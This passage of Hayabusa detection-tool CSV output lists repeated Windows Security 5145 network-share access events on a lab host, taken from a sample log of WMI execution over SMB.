+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 